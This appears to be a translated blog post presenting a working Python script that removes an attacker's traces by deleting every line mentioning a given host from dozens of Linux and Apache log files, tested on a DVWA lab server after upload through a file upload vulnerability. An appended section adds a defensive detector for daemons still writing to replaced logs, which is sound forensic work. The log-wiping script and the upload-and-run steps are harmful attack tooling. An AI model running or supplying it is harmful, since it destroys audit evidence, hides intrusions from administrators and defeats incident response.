The main flow is to define a list of logs containing the log files commonly found on Linux, then use os.path.exists() to check whether each file exists; if it does, call sed via the subprocess library to delete the lines of that log related to the specified host, thus clearing the traces.
First, a look at how the sed command is used on Linux:
In '/127.0.0.1/d', the d specifies a delete operation, deleting the lines that contain "127.0.0.1"; sed's -i option means the file contents are modified in place. As can be seen, every line containing "127.0.0.1" has been deleted.
The script is as follows:
```python
#coding=utf-8
import os
import sys
import subprocess

def Clear_The_Log(host):
    # Common Linux / Apache log locations to check (duplicate entries removed,
    # stray spaces and a missing leading slash in the original list fixed)
    logs = [
        "/var/log/messages", "/var/log/messages.1", "/var/log/messages.2",
        "/var/log/messages.3", "/var/log/messages.4", "/var/log/message",
        "/etc/syslog.conf", "/var/log/secure", "/var/log/secure.1",
        "/var/log/secure.2", "/var/log/secure.3", "/var/log/secure.4",
        "/var/log/lastlog", "/var/log/auth.log", "/var/log/vsftpd.log",
        "/var/log/apache2/access.log", "/var/log/apache2/access_log",
        "/var/log/apache2/error.log", "/var/log/apache2/error.log.1",
        "/var/log/apache2/error_log",
        "/var/log/apache/access.log", "/var/log/apache/access_log",
        "/var/log/apache/error.log", "/var/log/apache/error_log",
        "/usr/local/httpd/error.log", "/apache/apache/message.log",
        "/var/www/logs/error_log", "/var/www/logs/error.log",
        "/var/www/logs/access_log", "/var/www/logs/access.log",
        "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log",
        "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log",
        "/usr/local/apache/logs/error_logerror_log.old",
        "/usr/local/apache/logs/access_logaccess_log.old",
        "/var/log/error_log", "/var/log/error.log",
        "/var/log/access_log", "/var/log/access.log",
    ]
    print "[*]Trying to find the logs of the Linux......"
    for log in logs:
        if os.path.exists(log):
            print "[+]Found the log: " + log
            # sed -i '/<host>/d' <log>: delete every line containing the host, in place.
            # Arguments are passed as a list (no shell=True) so the host value
            # is handed to sed verbatim instead of being parsed by the shell.
            subprocess.call(["sed", "-i", "/%s/d" % host, log])
            print "[+]Clear the log successfully."

def main():
    usage = ("[*]Usage: python Linux_log_clear.py [host]\n"
             " Example: python Linux_log_clear.py 127.0.0.1")
    # Check the argument count before indexing sys.argv: the original tested
    # len(sys.argv) < 1 after reading sys.argv[1], so the check could never fire
    # and a missing argument only surfaced as an IndexError in the except block.
    if len(sys.argv) < 2:
        print usage
        return
    host = sys.argv[1]
    try:
        Clear_The_Log(host)
    except Exception as e:
        print "[-]Error: %s" % e
        print usage

if __name__ == '__main__':
    main()
```
First, a test on BT5:
Next, a test on the DVWA web server:
Check DVWA's Apache access.log and find the records of visits from the physical host:
Command: vim /var/log/apache2/access.log
Then search for it with the following vim command: /192.168.220.1
The web access records of the physical host, 192.168.220.1, can be seen.
Next, upload the script (for example by borrowing a file upload vulnerability) and run it:
As can be seen, the script found Apache's access.log and cleared it.
Now confirm it by checking the Apache access.log file again:
vim /var/log/apache2/access.log
As can be seen, the relevant information can no longer be found; the web access records of host 192.168.220.1 have indeed been removed, so the log-trace clearing succeeded.
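One side effect of this technique that a responder can check for, as an added example that is not part of the original post: GNU sed -i writes a new file and renames it over the original, so a daemon that still holds the old log open (Apache here) keeps writing to the unlinked inode, which /proc/<pid>/fd reports as "<path> (deleted)". The function names and the /var/log prefix are assumptions; the sample fd table is constructed.

```python
# Added example, not from the original post: flag processes that still hold an
# unlinked log file open, the state left behind when a live log is rewritten with
# `sed -i` (new inode renamed over the old one) while the daemon keeps its old fd.
import os
import re

LOG_DIRS = ("/var/log/",)  # assumption: log locations worth watching

DELETED_RE = re.compile(r"^(?P<path>.+) \(deleted\)$")

def flag_deleted_log_handles(fd_entries, log_dirs=LOG_DIRS):
    """fd_entries: iterable of (pid, comm, fd, link_target) as read from
    /proc/<pid>/fd/<fd>. Returns the entries whose target is an unlinked
    file under one of log_dirs."""
    hits = []
    for pid, comm, fd, target in fd_entries:
        m = DELETED_RE.match(target)
        if not m:
            continue
        path = m.group("path")
        if any(path.startswith(d) for d in log_dirs):
            hits.append({"pid": pid, "comm": comm, "fd": fd, "path": path})
    return hits

def read_proc_fds(proc="/proc"):
    """Walk /proc and yield (pid, comm, fd, link_target) for every readable fd symlink."""
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc, pid, "comm")) as f:
                comm = f.read().strip()
            fd_dir = os.path.join(proc, pid, "fd")
            for fd in os.listdir(fd_dir):
                yield pid, comm, fd, os.readlink(os.path.join(fd_dir, fd))
        except OSError:
            continue  # process exited, or not inspectable without root

# Constructed sample in the shape read_proc_fds() yields: apache2 after the
# access log it was writing to has been replaced underneath it.
SAMPLE_FDS = [
    ("1234", "apache2", "7", "/var/log/apache2/access.log (deleted)"),
    ("1234", "apache2", "8", "/var/log/apache2/error.log"),
    ("2000", "bash", "0", "/dev/pts/0"),
    ("3000", "vim", "4", "/tmp/.swp123 (deleted)"),  # unlinked but not a log: ignored
]

if __name__ == "__main__":
    for hit in flag_deleted_log_handles(read_proc_fds()):
        print("pid %(pid)s (%(comm)s) fd %(fd)s still writes to unlinked %(path)s" % hit)
```

Ordinary log rotation produces the same state until the daemon reopens its logs, so a hit is a prompt to compare against the rotation schedule and the file's inode and change time rather than proof of tampering on its own.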